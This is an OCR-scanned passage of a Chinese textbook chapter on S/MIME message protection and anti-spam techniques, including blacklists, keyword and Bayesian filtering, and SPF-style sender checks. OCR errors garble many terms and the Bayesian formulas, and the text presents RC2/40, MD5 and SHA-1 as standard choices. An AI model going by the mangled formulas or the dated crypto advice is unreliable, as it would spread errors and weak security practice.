(3) 如 果 发 送 者 没有 他 想 要 的 接收 者 的 解密 能 力 的 任何 知识 ， 并 且 愿 意 冒 险 ， 那 么 发 
送 代 理应 该 使 用 三 重 DES， 此 时 接收 方 有 可 能 不 能 解密 该 消息 。 

(4) 如 果 发 送 者 没有 想 要 的 接收 者 解密 能 力 的 任何 知识 ， 且 不 愿 冒 险 ， 则 发 送 代理 必 
须 使 用 RC2/40。 

如 果 消 息 需要 发 送 给 多 个 接收 者 ， 却 又 没有 共同 的 加 密 算法 ， 那 么 发 送 代理 必须 发 送 
两 个 消息 。 此 时 ， 消 息 的 安全 性 依赖 于 低 安全 级 别 消 息 副 本 的 传输 安全 。 

3. S/MIME 消息 


S/MIME 使 用 一 系列 新 的 MIME 内 容 类 型 ， 如 表 6-8 所 示 。 所 有 的 新 类 型 均 使 用 指定 
的 PKCS(Public-Key Cryptography Specification) 指 示 。PKCS 是 SA 实验 室 发 布 的 一 组 公 钥 
密码 规格 说 明 。 


表 6-8 ”S/MIME 的 内 容 类 型 


类 型 描 述 
Multipart Sipied 透明 签名 的 消息 分 成 两 部 分 : 消 
息 部 分 和 签名 部 分 
Application SignedData 签名 的 S/MIME 实体 


EnvelopedData 加 密 的 S/MIME 实体 
degenerate SignedData ”| 仅 包含 公 钥 证 书 的 实体 

压缩 的 SIMIME 实体 

签名 部 分 的 内 容 类 型 为 multipart/ 
signed 的 消息 


下 面 分 析 S/MIME 消息 准备 的 一 般 操作 和 消息 准备 的 一 般 过 程 。 

1) ”保护 MIME 实体 

S/MIME 使 用 签名 、 解 密 组 合 来 保证 MIME 实体 的 安全 。 一 个 MIME 实体 可 能 是 一 
个 完整 的 消息 。 如 果 MIME 的 内 容 类 型 为 multipart， 那 么 一 个 MIME 实体 是 消息 的 一 个 
或 多 个 子 部 分 。MIME 实体 遵从 MIME 消息 准备 的 一 般 规则 ; 之 后 该 MIME 实体 附加 一 
些 与 安全 有 关 的 数据 ， 如 算法 标识 符 和 证 书 ， 被 S/MIME 处 理 生 成 为 PKCS 的 对 象 ， 此 后 
PKCS 对 象 被 看 做 消息 内 容 并 被 封装 到 MIME 中 。 

在 所 有 情况 下 ， 被 发 送 的 消息 都 应 转换 成 规范 的 形式 。 对 给 定 的 类 型 、 消 息 内 容 必须 
使 用 其 规范 的 形式 ， 对 于 多 部 分 消息 ， 每 个 字 部 分 都 要 使 用 规范 的 形式 。 

使 用 编码 转换 时 应 注意 ， 对 于 大 多 数 情况 ， 使 用 安全 算法 后 会 产生 部 分 或 全 部 二 进 制 
数据 表示 的 对 象 ， 该 对 象 被 封装 在 外 部 MIME 消息 中 ， 然 后 进行 编码 转换 ， 可 以 使 用 
base64 编码 。 对 于 多 部 分 的 签名 消息 ， 安 全 处 理 不 会 改变 字 部 分 的 消息 内 容 。 如 果 消 息 不 
是 用 7 比特 表示 的 ， 应 该 使 用 base64 或 quoted-printable 编码 ， 使 得 应 用 签名 的 内 容 不 会 
被 改变 。 


pkcs7-signature SignedData 
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2) ”封装 数据 Enveloped Data 

Application/Pkcs7-mime 子 类 型 用 于 四 类 S/MIME 处 理 ， 每 类 处 理 都 有 唯一 的 smime- 
type 参数 。 在 所 有 情况 下 ， 对 象 的 结果 实体 都 用 ITU-T 推荐 的 X.209 定义 基本 编码 规则 
BER 表示 法 。BER 格式 由 8 比特 字符 串 组 成 ， 是 二 进 制 数据 ， 因 此 该 对 象 可 在 外 部 
MIME 消息 中 用 base64 编码 。 

MIME 实体 准备 封装 数据 的 步骤 如 下 : 

e@ ”为 特定 的 对 称 加 密 算 法 (RC2/40 或 三 重 DES) 生 成 伪 随 机 的 会 话 密 钥 ; 

@ ”用 每 个 接收 方 的 RSA 公 钥 分 别 加 密会 话 密 钥 ; 

@ ”为 每 个 接收 方 准备 一 个 接收 方 信息 块 RecipientInfo， 包 含 接收 方 的 公 钥 证 书 、 加 

密会 话 密 钥 的 算法 标识 和 加 密 后 的 会 话 密 钥 ; 

@ ”用 会 话 密 钥 加 密 消息 内 容 。 

接收 方 信息 块 后 紧 随 加 密 的 内 容 ， 组 成 封装 数据 ， 然 后 使 用 base64 进行 编码 转换 。 
接收 方 收 到 消息 后 ， 首 先进 行 base 解码 ， 然 后 使 用 接收 者 的 私 钥 恢 复 会 话 密 钥 ， 最 后 使 
用 会 话 密 钥 解 密 消息 内 容 。 

3) ”签名 数据 Signed Data 

Smime-type 的 签名 数据 可 以 被 一 个 或 多 个 签名 者 使 用 。 下 面 以 单个 数字 签名 为 例 ， 讨 
论 准备 一 个 封装 数据 MIME 实体 的 过 程 。 

e ”选择 消息 签名 算法 (SHA-1 或 MD5)。 

@ ”计算 需要 签名 内 容 的 消息 散 列 或 散 列 函数 。 

@ ”使 用 发 送 者 的 私 钥 加 密 消息 散 列 。 

@ ”准备 SignerInfo( 签 名 者 信息 ) 的 数据 块 ， 包 含 签名 者 的 公 钥 证 书 、 消 息 散 列 算法 

的 标识 符 、 用 来 加 密 消息 散 列 算法 的 标识 符 、 加 密 的 消息 散 列 。 

签名 数据 实体 由 一 系列 块 组 成 ， 包 括 消 息 散 列 算法 标识 符 、 被 签名 的 消息 和 
SignerInfo。 另 外 ， 还 可 能 包括 公 钥 证 书 链 ， 发 送出 去 之 前 用 base64 编码 。 接 收 者 收 到 消 
息 后 ， 进 行 相反 的 过 程 ， 先 要 去 除 base64 编码 ， 然 后 使 用 签名 者 公 钥 解密 消息 散 列 函 
数 ， 接 收 者 计算 消息 散 列 并 与 解密 后 的 消息 散 列 对 比 ， 以 验证 签名 的 正确 性 。 

4) ”透明 签名 Clear signing 

透明 签名 通过 带 有 签名 子 类 型 的 多 部 分 内 容 类 型 来 实现 。 签 名 过 程 不 涉及 转换 签名 消 
息 的 形式 ， 消 息 以 明文 发 送 ， 接 收 者 只 要 具备 MIME 能 力 就 能 阅读 该 消息 。 

多 部 分 类 型 中 Signed 的 消息 由 两 部 分 组 成 : 第 一 部 分 可 以 是 任何 MIME 类 型 ， 但 必 
须 采 取 措 施 ， 使 消息 在 传送 过 程 中 不 被 改变 ， 因 此 ， 第 一 部 分 不 能 是 7 位 ， 需 要 用 base64 
或 quoted-printable 编码 。 随 后 的 处 理 过 程 与 签名 数据 相同 ， 但 签名 数据 格式 的 对 象 中 消息 
内 容 域 为 空 ， 对 象 与 签名 分 离 ， 然 后 用 base64 编码 ， 作 为 多 部 分 中 Signed 消息 的 第 二 个 
部 分 。 第 二 部 分 的 MIME 内 容 类 型 为 application/pkcs7-signarute。 

5) ”注册 请 求 Registration Request 

比较 典型 的 情况 是 : 一 个 应 用 或 用 户 要 向 证 书 管理 机 构 申 请 公 钥 证 书 。S/MIME 的 实 
体 application/pkcs10 用 来 传送 证 书 请 求 ， 包 括 证 书 请 求 信息 块 、 公 钥 加 密 算法 标识 符 、 用 
发 送 方 私 钥 对 证 书 请 求 信 息 块 签名 。 证 书 请 求 信息 块 包含 证 书 主体 的 名 字 和 该 用 户 公 钥 的 


标识 位 串 。 
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6) 仅 含 证 书 的 消息 Certificates Only Message 

仅 含 证 书 或 证 书 撤销 列表 CRL 的 消息 在 应 答 注册 请 求 时 发 送 。 该 消息 的 类 型 / 子 类 型 
为 application/pkcs7-mime， 同 时 带 有 一 个 退化 的 smime-type 参数 。 其 创建 过 程 与 创建 签名 
数据 信息 类 似 ， 只 是 没有 消息 内 容 和 签名 者 信息 块 。 


4. S/MIME 证书 处 理 


S/MIME 使 用 符合 义 .509 v3 标准 的 公 钥 证 书 。S/MIME 管理 者 和 /或 用 户 必须 为 每 个 客 
户 配置 可 信任 的 密 钥 表 和 废除 证 书 的 列表 ， 即 验证 签名 和 签名 消息 的 工作 通过 本 地 维护 证 
书 实现 ， 证 书 由 认证 机 构 颁 发 。 

S/MIME 用 户 必须 能 够 生成 符合 规范 要 求 的 密 钥 对 ， 密 钥 对 应 该 用 非 确定 的 随机 输入 
生成 。 用 户 必须 到 认证 机 构 注册 自己 的 公 钥 ， 获 得 公 钥 证 书 。 另 外 用 户 还 需要 将 证 书 存 储 
在 本 地 ， 并 负责 维护 工作 。 

一 些 公司 提供 证 书 认证 授权 服务 。Nortel 提供 的 企业 认证 授权 解决 方案 能 够 在 组 织 内 
部 提供 S/MIME 支持 ;VeriSign 提供 兼容 的 认证 服务 ， 颁 发 VeriSign 数字 证 书 的 X.509 证 
书 。 另 外 ， 还 有 一 些 认 证 机 构 如 GTE、U.S Postal Service 等 。 


5. S/MIME 的 增强 安全 服务 


关于 S/MIME，Intemet 草案 还 提出 了 三 种 增强 的 安全 性 服务 ， 如 下 所 述 。 

(1) 签收 : 要求 对 签名 数据 对 象 进行 签收 ， 并 通知 发 送 方 和 第 三 方 。 接 收 方 对 原始 消 
息 和 签名 进行 签名 ， 并 将 此 签名 与 消息 一 起 产生 一 个 新 的 S/MIME 消息 。 

(2) 安全 标签 : 在 签名 数据 对 象 的 认证 属性 中 可 以 包含 安全 标签 。 安 全 标签 是 一 个 描 
述 被 S/MIME 封装 的 信息 敏感 度 的 安全 信息 集合 ， 用 于 该 信息 的 访问 控制 管理 。 

(3) 安全 邮件 列表 : 在 一 对 多 发 送 消息 时 使 用 ， 邮 件 列表 代理 MLA 可 以 对 一 个 输入 
消息 按照 各 个 接收 方 的 不 同 要 求 进行 相应 的 加 密 处 理 ， 发 送 方 只 负责 将 MLA 加 密 好 的 消 
息 发 送出 去 。 


6.3 邮件 服务 器 安全 机 制 


除了 要 保护 邮件 传输 的 安全 外 ， 还 要 保护 邮件 服务 器 的 安全 。 除 了 一 般 的 服务 器 安全 
配置 与 防护 外 ， 更 要 加 强 邮件 服务 器 抵御 邮件 攻击 、 垃 圾 邮件 和 病毒 邮件 的 能 力 。 


6.3.1 防 垃圾 邮件 


垃圾 邮件 SPAM， 又 称 “不 请 自 来 的 商业 电子 邮件 ”。 中 国 互联 协会 在 《中 国 互联 网 
协会 反 垃 圾 邮件 规范 》 中 规定 : 垃圾 邮件 具有 以 下 属性 。 
e 。 收 件 人 无 法 拒 收 的 电子 邮件 。 
e@ 收 件 人 事先 没有 提出 要 求 或 者 同意 接收 的 广告 、 电 子 刊物 、 各 种 形式 的 宣传 品 等 
宣传 性 质 的 电子 邮件 。 
e@ ”含有 病毒 、 恶 意 代码 、 色 情 、 反 动 等 不 良 信息 或 者 有 害 信息 的 邮件 。 
e@ ”隐藏 发 件 人 身份 、 地 址 、 标 题 等 信息 的 电子 邮件 。 
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e@ ”含有 虚假 的 信息 源 、 发 件 人 、 路 由 等 信息 的 电子 邮件 。 

实际 上 ， 垃 圾 邮件 的 判定 会 因 人 而 异 ， 不 同 的 用 户 ， 在 不 同 的 环境 下 对 同一 邮件 的 判 
定 结果 会 存在 差异 。 

目前 ， 很 多 用 户 使 用 免费 邮箱 ， 免 费 邮 箱 对 垃圾 邮件 的 防范 效果 不 太 理想 ， 垃 圾 邮件 
的 发 送 者 可 以 轻松 的 通过 多 种 途径 获得 用 户 的 邮件 地 址 ， 如 穷 举 、 猜 测 和 自动 收集 程序 
等 。 人 们 在 上 网 的 过 程 中 也 不 可 避免 的 要 对 外 公布 自己 的 邮箱 地 址 ， 一 些 人 便 收 集 这 些 信 
息 后 出 售 。 

垃圾 邮件 的 泛滥 已 经 让 互联 网 不 堪 重 负 ， 垃 圾 邮件 的 危害 主要 表现 在 以 下 几 个 方面 。 

1) ”侵占 网 络 资源 

大 量 的 垃圾 邮件 会 占用 网 络 带宽 ， 堵 塞 邮件 服务 器 ， 降 低 整个 网 络 的 运行 效率 ， 影 响 
ISP 的 服务 形象 。 另 外 ， 一 些 人 利用 邮件 服务 器 发 送 垃圾 邮件 ， 会 导致 服务 器 被 列 入 垃圾 
邮件 黑 名 单 ， 服 务 器 被 外 部 封杀 。 因 此 邮件 服务 器 既 要 抵御 外 部 的 垃圾 邮件 ， 也 要 采取 措 
施 防 止 自己 的 用 户 对 外 发 送 垃圾 邮件 。 

2) ”侵犯 收 件 人 隐私 

当 自 己 的 邮箱 收 到 大 量 垃圾 邮件 的 时 候 ， 第 一 反应 就 是 ， 自 己 的 邮件 地 址 不 安全 了 ， 
很 可 能 被 出 卖 了 。 另 外 ， 下 载 和 处 理 这 些 邮件 会 耗费 收 件 人 大 量 的 时 间 、 精 力 和 金钱 。 当 
大 量 垃圾 邮件 充满 邮箱 的 时 候 ， 会 导致 正常 的 邮件 无 法 接收 ， 影 响 工 作 的 正常 进行 。 

3) ”被 黑客 利用 ， 成 为 攻击 工具 

黑客 把 病毒 和 恶意 代码 隐藏 在 垃圾 邮件 中 ， 用 户 一 旦 打开 这 些 邮件 ， 就 会 激活 隐藏 的 
病毒 或 木马 程序 ， 不 仅 危 害 用 户 自己 的 计算 机 ， 更 有 可 能 被 利用 成 为 病毒 的 传播 中 介 。 另 
外 ， 黑 客 还 会 利用 邮件 系统 发 起 垃圾 邮件 风暴 来 攻击 目标 ， 使 目标 机 瘫 病 、 拒 绝 服务 。 

4) “传播 有 害 信息 

垃圾 邮件 会 被 一 些 人 利用 来 传播 色情 信息 和 反动 信息 ， 给 社会 带 来 危害 ， 尤 其 对 于 青 
少年 ， 危 害 更 加 严重 。 

为 了 减少 垃圾 邮件 带 来 的 危害 ， 就 要 采取 各 种 技术 和 策略 歇 制 垃圾 邮件 的 传播 。 随 着 
垃圾 邮件 的 不 断 变化 ， 反 垃圾 邮件 技术 从 最 初 的 黑白 名 单 技术 、 简 单 的 关键 词 过 滤 ， 到 后 
来 基于 规则 的 过 滤 、 智 能 过 滤 ， 再 到 目前 的 多 种 组 合算 法 ， 反 垃圾 邮件 技术 经 历 了 一 个 不 
断 发 展 完善 的 过 程 ， 已 经 抵御 了 一 大 部 分 垃圾 邮件 的 侵害 。 目 前 存在 的 反 垃 圾 邮件 技术 主 
要 有 以 下 几 种 。 


1. IP 阻 断 列表 与 黑白 名 单 技术 


这 种 封禁 技术 是 将 那些 垃圾 邮件 服务 器 的 IP 地 址 (通过 技术 或 人 工 手段 确认 的 ) 列 入 一 
个 黑 名 单 (Black List)， 通 过 定期 或 实时 发 布 这 种 黑 名 单 ， 并 提供 黑 名 单 查询 服务 ， 让 合法 
的 邮件 服务 器 知道 应 当 拒 收 哪些 邮件 源 所 发 来 的 邮件 。 白 名 单 (White List) 是 一 个 可 信任 的 
邮件 服务 器 亿 地 址 的 列表 。 

现在 有 很 多 组 织 都 在 做 垃圾 邮件 的 黑白 名 单 ， 比 如 spamhaus、barracuda 等 。 如 果 给 
国外 朋友 发 邮件 后 收 到 了 有 如 下 内 容 的 退 信 : 

554 Service unavailable; Client host [mail.domain.edu.cn] blocked using 


Barracuda Reputation; 
http://www.barracudanetworks.com/reputation/?r=1l&ip=211.56.191.108 
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那么 ， 发 件 人 所 使 用 的 邮件 服务 器 211.56.191.108 很 可 能 被 列 入 了 垃圾 邮件 黑 名 单 
中 ， 可 以 到 上 面 给 出 的 网 站 中 提交 撤销 黑 名 单 的 申请 。 一 般 系 统 会 很 快 处 理 申 请 ， 从 黑 名 
单 中 撤销 提交 的 地 址 。 

使 用 黑白 名 单 的 方式 来 处 理 垃圾 邮件 可 以 有 效 地 减少 服务 器 的 负担 。 但 目前 垃圾 邮件 
的 发 送 技术 往往 采取 动态 全 地 址 ， 黑 名 单 技术 很 难 达到 时 效 性 ， 是 一 种 “亡羊补牢 ”的 
被 动 防御 方法 。 在 反 垃圾 邮件 产品 中 ， 该 技术 通常 作为 一 个 附属 模块 嵌入 ， 以 提高 过 滤 的 
效率 和 速度 。 

2. 过 滤 技 术 

过 滤 (Filter) 是 垃圾 邮件 处 理 中 一 种 常用 的 技术 。 这 种 技术 使 用 起 来 简单 直接 ， 过 滤 主 
要 用 于 接收 系统 MUA 或 MTA 来 辨别 和 处 理 垃圾 邮件 ， 如 Outlook、Sendmail。 该 技术 使 
用 最 为 广泛 ， 很 多 邮件 服务 器 上 的 反 垃 圾 邮件 插件 、 客 户 端的 反 垃圾 邮件 功能 等 都 是 采用 
过 滤 技 术 实现 的 。 

1) ”关键 词 过 滤 

关键 词 过 滤 技 术 通 常 总 结 一 些 简单 或 复杂 的 与 垃圾 邮件 关联 的 单词 ， 通 过 在 邮件 的 主 
体 或 内 容 中 进行 搜索 来 识别 和 处 理 垃圾 邮件 。 在 总 结 关键 词 中 可 以 使 用 通配符 ， 比 如 
“ 代 ? 开 ? 发 ? 票 ”。 这 种 方式 类 似 于 反 病 毒 软件 利用 的 病毒 特征 ， 这 是 一 种 简单 的 内 容 
过 滤 方 式 ， 它 的 前 提 是 必须 创建 一 个 庞大 的 过 滤 关 键 词 列 表 。 

关键 词 过 滤 的 效果 和 关键 词 有 直接 联系 ， 关 键 词 列表 有 时 会 误 报 。 对 邮件 的 全 文 检索 
会 消耗 的 系统 资源 大 量 的 资源 和 网 络 带宽 。 规 则 库 维 护 的 成 本 高 ， 并 且 关键 词 也 很 容易 绕 
过 ， 比 如 拆字 ， 使 用 图 片 等 。 

2)” 散 列表 

散 列表 是 邮件 系统 通过 创建 摘要 来 描述 邮件 的 内 容 ， 如 果 摘 要 是 相同 的 ， 就 认为 邮件 
是 相同 的 ， 比 如 将 邮件 的 内 容 、 发 件 人 等 作为 参数 ， 计 算得 出 该 邮件 的 摘要 。 一 些 ISP 采 
用 这 种 方式 ， 如 果 出 现 重 复 的 邮件 摘要 ， 就 可 以 怀疑 是 大 批量 发 送 邮 件 了 。 

3) “基于 规则 的 过 滤 

基于 规则 的 过 滤 根 据 邮 件 的 默写 特征 (如 单词 、 词 组 、 位 置 、 大 小 、 附 件 等 ) 来 形成 规 
则 ， 通 过 这 些 规 则 来 描述 垃圾 邮件 ， 就 像 IDS 中 描述 一 条 入 侵 事 件 一 样 。 

还 有 一 种 基于 规则 评分 的 过 滤 ， 给 每 个 规则 或 关键 词 赋予 一 个 分 值 ， 分 值 越 高 ， 该 邮 
件 为 垃圾 邮件 的 可 能 性 就 越 高 ， 得 分 超过 某 一 给 定 的 闵 值 (Threshold) 时 ， 该 邮件 就 被 判定 
为 垃圾 邮件 。 

要 使 过 滤器 有 效 ， 就 意味 着 管理 人 员 要 维护 一 个 庞大 的 规则 库 。 同 关键 词 过 滤 一 样 ， 
其 耗费 的 资源 较 多 ， 规 则 库 的 维护 成 本 也 非常 高 。 


3. 人 工 智能 和 概率 学 方法 


人 工 智 能 的 方法 也 是 一 种 过 滤 技 术 ， 它 将 人 工 智 能 的 一 些 分 类 方法 和 机 器 学 习 理论 应 
用 于 垃圾 邮件 的 过 滤 ， 如 支持 向 量 机 (Support Vector Machine，SVM)、 贝 叶 斯 分 类 器 
(Bayesian Classifiers) 和 决策 树 等 。 

贝 叶 斯 理论 在 计算 机 业 中 应 用 相当 广泛 ， 它 是 一 种 对 事物 的 不 确定 性 描述 。 贝 叶 斯 算 
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法 的 过 滤器 就 是 一 个 基于 评分 的 过 滤器 ， 它 计算 邮件 成 为 垃圾 邮件 的 概率 。 首 先 它 要 从 大 
量 的 垃圾 邮件 和 正常 邮件 中 进行 学 习 ， 提 取 特 征 字 符 串 ， 并 给 出 一 个 分 数 。 在 垃圾 邮件 中 
出 现 特 征 串 赋予 一 个 正 分 数 ， 如 果 在 正常 邮件 中 也 检测 到 了 这 个 特征 串 ， 就 赋予 一 个 负 分 
数 ， 用 来 降低 得 分 ， 最 后 得 到 一 个 邮件 整体 总 分 ， 通 过 这 个 分 数 来 判断 该 邮件 是 否 为 垃圾 
邮件 。 

贝 叶 斯 算法 计算 的 特征 值 通常 来 自 : 
邮件 正文 中 的 单词 。 
邮件 头 (发 送 者 、 传 递 路 径 等 )。 

其 他 表现 ， 如 HIML 编码 。 
Meta 信息 ， 比 如 特殊 短语 出 现 位 置 等 。 

贝 叶 斯 算法 的 步骤 如 下 : 

(1) 收集 大 量 的 垃圾 邮件 和 非 垃圾 邮件 ， 建 立 垃圾 邮件 集 和 非 垃圾 邮件 集 。 

(2) 提取 独立 的 字符 串 作 为 TOKEN 串 ， 并 统计 每 个 TOKEN 串 ( 如 t1, t,t， ...， tn) 
出 现 的 次 数 ， 即 字 频 。 按 照 这 种 方法 分 别处 理 垃圾 邮件 和 非 垃圾 邮件 。 

(3) 为 每 个 邮件 集 建立 一 个 哈 希 表 ，hashtable _ good 对 应 非 垃 圾 邮件 集 ， 
hashtable bad 对 应 垃圾 邮件 集 ， 哈 希 表 中 存储 TOKEN 串 到 字 频 的 映射 关系 。 

(4) 计算 每 个 哈 希 表 中 TOKEN 串 出 现 的 概率 P(b)=(t 的 字 频 )/( 对 应 哈 希 表 长 度 )， 
P1(t) 表 示 在 hashtable_good 中 的 值 ，P2( 切 表示 在 hashtable_ bad 中 的 值 。 

(5) 综合 考虑 hashtable good 和 hashtable bad， 推 断 新 邮件 中 出 现 TOKEN 串 时 ， 为 
垃圾 邮件 的 概率 ; 用 A 表示 邮件 为 垃圾 邮件 ， 则 : 

P(A| t)= P2(t)/ [P1(t)+P2(®)] 

(6) 建立 新 的 哈 希 表 bashtable_probability 存储 到 P(A| 忆 的 映射 。 

(7) 根据 bashtable probability 计算 一 封 新 到 的 邮件 为 垃圾 邮件 的 可 能 性 ， 当 新 到 一 
封 邮件 ， 按 照 步骤 (2)， 生 成 TOKEN 串 ， 通 常 选取 邮件 中 P(A| 句 最 高 的 N 个 TOKEN 串 
(Paul Graham 的 做 法 是 选 出 P(A| 名 最 高 的 15 个 词 )，bashtable_probability 中 对 应 的 值 为 
P1，P2，..….，PN， 则 该 邮件 为 垃圾 邮件 的 概率 为 : 

P(Alti, ta, ..., tn)=(P1*P2 *...*PN)/[ Pl1*P2*...*PN+(1-P1)*(1-P2)*...(1-PN)] 

当 P(Alh，b，.…，t) 超 过 预定 阔 值 时 ， 就 可 以 判定 该 邮件 为 垃圾 邮件 。 

通过 不 断 的 分 析 ， 过 滤器 也 自我 更 新 ， 这 样 贝 叶 斯 过 滤器 就 有 了 自 适 应 能 力 。 另 外 ， 
用 户 也 可 以 手工 操作 ， 以 适应 一 些 临 时 出 现 的 特殊 情况 。 

基于 过 滤器 原理 的 反 垃 圾 邮件 系统 也 有 其 局 限 性 。 目 前 垃圾 邮件 的 发 送 工 具 也 不 是 静 
态 的 ， 它 们 会 很 快 适应 过 滤器 ， 并 通过 一 些 技术 手段 绕 过 过 滤器 ， 如 改变 拼写 和 插入 句子 
等 。 另 外 还 有 误 报 问题 ， 把 正常 邮件 当做 垃圾 邮件 来 处 理 。 

还 有 一 种 近年 来 用 得 比较 多 的 “基于 行为 模式 识别 模型 ”垃圾 邮件 识别 方法 ， 该 方 
法 利用 概率 统计 数学 模型 对 垃圾 邮件 进行 分 类 分 析 统计 。 与 以 往 不 同 ， 行 为 模式 识别 在 分 
析 时 不 但 导入 邮件 内 容 本 身 的 特征 ， 而 且 最 关键 的 是 全 面 加 入 了 与 各 类 行为 相关 的 因素 。 
通过 对 大 量 的 垃圾 邮件 样本 的 分 析 、 统 计 ， 并 经 过 大 量 的 计算 ， 归 纳 出 垃圾 邮件 发 送行 为 
模式 识别 模型 。 行 为 模式 识别 模型 包含 了 邮件 发 送 过 程 中 的 各 类 行为 要 素 ， 如 时 间 、 频 
度 、 发 送 下、 协议 声明 特征 、 发 送 声明 指纹 等 。 
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行为 模式 识别 不 但 定义 有 垃圾 邮件 的 模式 ， 也 定义 了 正常 邮件 的 模式 。 在 统计 分 析 中 
研究 人 员 发 现 ， 行 为 特征 上 垃圾 邮件 与 正常 邮件 具有 极 高 的 区 分 度 ， 且 无 论 内 容 如 何 均 相 
对 为 固有 特征 ， 特 别 是 对 大 量 采用 动态 人 P 发 送 的 邮件 ， 特 征 更 加 明显 ， 所 以 一 封 正常 邮 
件 会 很 快 被 识别 出 来 。 

采用 行为 模式 识别 模型 可 以 提高 垃圾 邮件 辨别 的 准确 率 ， 且 不 需要 对 信件 的 全 部 内 容 
进行 扫描 ， 与 内 容 过 滤 相 比 大 大 降低 了 计算 的 复杂 度 。 


4. 反 向 查询 


大 部 分 垃圾 邮件 使 用 伪造 的 发 送 地 址 ， 伪 造 的 地 址 看 上 去 来 自 于 可 信 的 域 。 为 了 限制 
这 种 伪造 的 发 送 地 址 ， 一 些 系统 要 求 验证 发 送 者 的 邮件 地 址 ， 这 些 系统 包括 : Reverse 
Mail Exchange (RMX)、 Sender Permitted Form(SPF) 和 Designated Mailers Protocol(DMP). 
类 似 于 MX， 反 向 查询 就 是 定义 反 向 的 MX 记录 ， 用 来 判断 邮件 的 指定 域名 和 卫 地 址 是 
否 完全 对 应 。 

在 邮件 服务 器 中 还 可 以 使 用 用 户 真实 性 认证 ， 也 就 是 在 用 户 发 送 邮 件 时 验证 用 户 的 真 
实 身份 ， 防 止 用 户 使 用 伪造 的 身份 ， 通 过 本 服务 器 发 送 大 量 垃圾 邮件 。 


5. 质询 


垃圾 邮件 发 送 者 一 般 使 用 工具 自动 发 送 大 量 的 垃圾 邮件 。 质 询 技术 试图 通过 减缓 大 量 
邮件 的 发 送 过 程 ， 或 增加 发 送 邮件 的 成 本 来 阻止 垃圾 邮件 的 发 送 。 同 时 ， 不 会 对 正常 用 户 
的 邮件 发 送 产生 太 大 的 影响 。 目 前 有 两 种 质询 方式 : 质询 -响应 和 计算 质询 。 

(1) 质询 -响应 (Challenge-Response，CR) 系 统 保存 有 许可 发 送 者 的 列表 。 当 用 户 发 送 
邮件 时 ， 邮 件 不 会 被 立即 传送 ， 而 是 临时 保存 下 来 ， 然 后 向 邮件 的 发 送 者 返回 一 封包 含 质 
询 的 邮件 。 质 询 可 以 是 连接 URL 或 者 要 求 回复 。 当 完成 质询 后 ， 新 的 发 送 者 被 加 入 到 许 
可 发 送 者 列表 中 。 

(2) 计算 质询 (Computational Challenges，CC) 方 式 试图 通过 增加 发 送 邮件 的 成 本 来 阻 
止 垃圾 邮件 的 大 量 发 送 。 大 部 分 计算 质询 系统 使 用 复杂 的 算法 来 故意 拖延 时 间 。 对 于 正常 
用 户 ， 只 发 送 少量 的 邮件 ， 对 这 种 延迟 基本 上 察觉 不 出 来 。 如 果 要 一 次 性 发 送 大 量 的 垃圾 
邮件 ， 花 费 的 时 间 就 相当 可 观 ， 此 类 系统 包括 Hash Cash 和 微软 的 Black Penny。 


6. 密码 术 


还 可 以 用 密码 技术 来 验证 垃圾 邮件 的 发 送 者 ， 抵 御 垃圾 邮件 。 像 上 节 提 到 的 用 数字 证 
书 来 实现 认证 。 如 果 数 字 证 书 认证 不 能 通过 认证 ， 就 认为 该 邮件 是 伪造 的 。 
7. 反 垃 圾 邮件 技术 发 展 趋势 


尽管 在 多 种 技术 的 综合 运用 下 ， 垃 圾 邮件 得 到 了 一 定 的 遏制 ， 但 一 些 投机 者 总 是 能 想 
出 各 种 方法 躲避 堵截 和 控制 ， 新 出 现 的 垃圾 邮件 发 送 技巧 有 : 盗 取 合 法 人 身份 、 图 片 垃圾 
邮件 及 多 层 图 片 垃圾 邮件 、 躲 避 全 球 耳 监控 及 信誉 评分 、 躲 避 内 容 过 滤 、 夹 带 URL 和 电 
话 号 码 。 

针对 这 些 问 题 的 技术 方案 如 下 。 

1) “发 件 人 特征 识别 技术 

在 身份 欺骗 技术 被 广泛 利用 的 新 形势 下 ， 发 件 人 特征 识别 技术 应 运 而 生 。 首 先 要 验证 
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发 信者 身份 并 预测 其 行为 ， 包 括 列举 垃圾 邮件 制造 者 的 行为 以 及 加 强 不 依靠 身份 验证 进行 
辨认 的 措施 。 对 于 发 件 人 特征 识别 技术 来 说 ， 邮 件 的 信誉 校 验 是 最 基本 的 ， 它 必须 通过 启 
发 式 和 人 性 化 的 检查 来 勾勒 出 垃圾 邮件 的 行为 特征 ， 必 须 具备 多 样 的 有 效 对 策 。 

2) ”信誉 评分 技术 

电子 邮件 信誉 与 投递 是 快速 增长 的 新 兴 行 业 。 专 家 把 电子 邮件 信誉 比喻 成 驾驶 记录 或 
信用 记录 。 如 果 驾 驶 记录 不 佳 ， 你 必须 付 更 高 的 保险 费 。 如 果 电 子 邮件 信誉 差 ， 发 出 的 邮 
件 就 会 被 丢 入 垃圾 桶 。 如 Habeas 公司 从 事 信誉 过 滤 服 务 ， 协 助 企业 改良 电子 邮件 的 
名 声 。 

3) ”多 重 图 片 识别 技术 OCR 

打击 图 片 垃 圾 邮件 的 主导 技术 有 图 片 垃 圾 邮件 指纹 识别 技术 、OCR 识别 技术 以 及 第 
三 代 图 像 防御 技术 。 在 OCR 识别 技术 的 初期 ， 图 片 垃圾 邮件 的 发 送 者 们 企图 使 用 动态 的 
gif 图 像 使 内 容 占用 多 帧 。 而 且 ， 他 们 采用 横 线 ， 符 号 和 其 他 图 像 模糊 图 片 内 的 文字 。 为 
了 对 付 这 些 技巧 ，OCR 引入 了 动态 gif 文件 分 析 和 模糊 文本 识别 功能 。 现 在 OCR 可 以 深 
入 分 析 图 片 ， 在 进行 图 片 识别 之 前 对 表象 图 片 进行 规范 化 处 理 ， 来 防止 图 片 垃圾 邮件 中 的 
图 片 掩饰 、 不 同 颜色 的 对 比 ， 以 及 组 合 文字 、 背 景 等 手段 。 

4) ”意图 分 析 技 术 

意图 分 析 技 术 包 括 鉴别 历史 记录 里 的 错误 邮件 发 送 基 点 及 其 行为 和 意图 。 大 部 分 垃圾 
邮件 背后 的 动机 是 使 收 件 人 去 做 某 件 事情 ， 如 登录 某 个 站 点 、 拨 打 某 个 电话 、 购 买 某 只 股 
票 等 。 这 些 动 机 就 是 邮件 的 意图 ， 观 察 这 些 意图 ， 并 进行 统计 分 析 ， 找 出 其 中 的 关联 和 共 
同 点 。 大 部 分 邮件 的 意图 是 让 用 户 点 击 一 个 网 页 或 链接 。 即 使 邮件 发 送 者 试图 通过 卫 地 
